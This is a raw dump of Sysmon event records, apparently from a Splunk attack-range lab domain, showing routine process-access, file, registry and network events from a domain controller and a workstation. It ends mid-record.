09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.567{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.336{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B4DC06DA8F1AE9C37AAB76BA32B8D4,SHA256=4605C961454CE857408F3A494C02AAAD8699E3533B6A7CC3BD867FE83048ABB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978651Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:56.208{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58893-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978650Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:59.040{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A1CC5BDD84C6AD913030615F285EBA,SHA256=04BACB3858BB16B7AE4A43A5E6A233824EE827218D4AC723120C13BB316D717D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:00.384{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513B1CE74E54FB735B7DA39FB61E3758,SHA256=7FA77716CC213185A7D8AE7755FAC6304CEBF02C5A07A479BEEE1C96AE8DA71F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978652Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:00.055{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=310C5BF785DBF3A05B132B3552D2A6DC,SHA256=F7280084EFD419C794152D6FD4FD20FE8D8DEE17FA2A0388065EE0C16C7F6BB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:00.087{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A6DAA3119DEDB2198EB4B2D7189BE3B,SHA256=ABCE77299D704C71C970EE0983CEADBD8CF8776DF089EFE6C84943B938DB5153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:01.405{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39A32FEC75330D1152DE62596ECBB36F,SHA256=53F29A4390D84BBBA5EAD7DFD2057B70508F8C5B8065575ECAEDBD00FFC747FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978654Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:58.729{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59375-false10.0.1.12-8000- 23542300x8000000000000000978653Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:01.055{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78DEF2E79FA75D62AAFD7215E8396E5,SHA256=08E01401C6834F45CC958A210EFFD4D47E235453B5837D55244921D5F3213CA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.420{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF1D5178B43F1131F27237387D32E0B0,SHA256=21C95B71DD10B42D33F15CF3745CCD705FAB5424B91269188D95DC257D1CD885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978656Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:02.201{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4307MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978655Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:02.058{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D214760B47A6CB8056A44545DED5413,SHA256=0837657D29F7A6E86D7E9480A39BCFB04A5EE1935826625EB1AA64BBBAFA0271,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:11:02.389{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x80000000000000001050055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:11:02.389{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Config SourceDWORD (0x00000001) 13241300x80000000000000001050054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:11:02.389{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_C073BBA9-345E-4F58-AADF-98D983B75502.XML 23542300x80000000000000001050060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:03.435{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=228C14550569C2C276D9BBDD1D15C806,SHA256=72454D29946A2525E0FBFCAFADB90ADE690F37AAD1DD50C3022E091469CE4B5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:03.435{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BABF468E8FC6C719444FDE31A7CED65F,SHA256=91BF8A0F8478BA7D3E194FA50FF17B9C8C5B9621E77F97CE1130D967E66A91D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978658Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:03.213{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4308MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978657Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:03.072{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05DC4BE269B828BB8D050D78F8E2364B,SHA256=F883FA762163F4714C9A4F03A60A63D0323CC8A7E2B636BD2745021322C4C17F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:59.927{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53353-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:04.487{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18E360DEE28B9F04AFF27EF18F97C335,SHA256=9C48D517DD109F3380A4BF9EB148DA1210D7AC7BD048F72782AD7C0AE77D334F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978659Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:04.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FBE24FE58B552408E5443B4B4172A67,SHA256=C2476FD880910A8B41D5187447779C3CFCD347D191315FCADCDFBDC1AE4BA2BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.106{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53356-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001050065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.106{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53356-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001050064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.096{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53355-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001050063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.096{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT 